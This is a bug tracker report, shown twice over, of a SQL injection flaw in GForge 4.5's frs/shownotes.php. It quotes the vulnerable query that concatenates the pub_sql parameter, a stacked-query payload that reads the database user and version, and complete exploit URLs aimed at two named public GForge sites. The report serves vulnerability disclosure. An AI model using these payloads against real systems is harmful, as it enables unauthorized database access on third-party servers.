Details
It seems like $pub_sql is not really used at all here, but somehow it got
included. file shownotes.php line 31:
$result=db_query("SELECT frs_release.notes,frs_release.changes,
frs_release.preformatted,frs_release.name,frs_package.group_id,frs_package.is_public
FROM frs_release,frs_package
WHERE frs_release.package_id=frs_package.package_id
$pub_sql
AND frs_release.release_id='$release_id'");
With an special query an attacker can run custom sql queries:
pub_sql=;select 1 as is_public, X as group_id, current_user as name, 4 as
notes, version() as changes, 6;/*
release_id=*/ -- b
X being a valid group on the installation, the query becomes:
SELECT frs_release.notes,frs_release.changes,
frs_release.preformatted,frs_release.name,frs_package.group_id,frs_package.is_public
FROM frs_release,frs_package
WHERE frs_release.package_id=frs_package.package_id
;select 1 as is_public, X as group_id, current_user as name, 4 as notes,
version() as changes, 6;/*
AND frs_release.release_id='*/ -- b'
Example sites
http://gforge.lug.fi.uba.ar/frs/shownotes.php?release_id=*/%20--%20454&pub_sql=;select%201%20as%20is_public,11%20as%20group_id,current_user%20as%20name,4%20as%20notes,version()%20as%20changes,6;/*
http://alioth.debian.org/frs/shownotes.php?release_id=*/%20--%20454&pub_sql=;select%201%20as%20is_public,30865%20as%20group_id,current_user%20as%20name,4%20as%20notes,version()%20as%20changes,6;/*
The debian site will probably fixed soon, I'm reporting this to they too. |
Details
It seems like $pub_sql is not really used at all here, but somehow it got
included. file shownotes.php line 31:
$result=db_query("SELECT frs_release.notes,frs_release.changes,
frs_release.preformatted,frs_release.name,frs_package.group_id,frs_package.is_public
FROM frs_release,frs_package
WHERE frs_release.package_id=frs_package.package_id
$pub_sql
AND frs_release.release_id='$release_id'");
With an special query an attacker can run custom sql queries:
pub_sql=;select 1 as is_public, X as group_id, current_user as name, 4 as
notes, version() as changes, 6;/*
release_id=*/ -- b
X being a valid group on the installation, the query becomes:
SELECT frs_release.notes,frs_release.changes,
frs_release.preformatted,frs_release.name,frs_package.group_id,frs_package.is_public
FROM frs_release,frs_package
WHERE frs_release.package_id=frs_package.package_id
;select 1 as is_public, X as group_id, current_user as name, 4 as notes,
version() as changes, 6;/*
AND frs_release.release_id='*/ -- b'
Example sites
http://gforge.lug.fi.uba.ar/frs/shownotes.php?release_id=*/%20--%20454&pub_sql=;select%201%20as%20is_public,11%20as%20group_id,current_user%20as%20name,4%20as%20notes,version()%20as%20changes,6;/*
http://alioth.debian.org/frs/shownotes.php?release_id=*/%20--%20454&pub_sql=;select%201%20as%20is_public,30865%20as%20group_id,current_user%20as%20name,4%20as%20notes,version()%20as%20changes,6;/*
The debian site will probably fixed soon, I'm reporting this to they too. |
[#5553] Gforge 4.5 stable SQL injection frs/shownotes.php
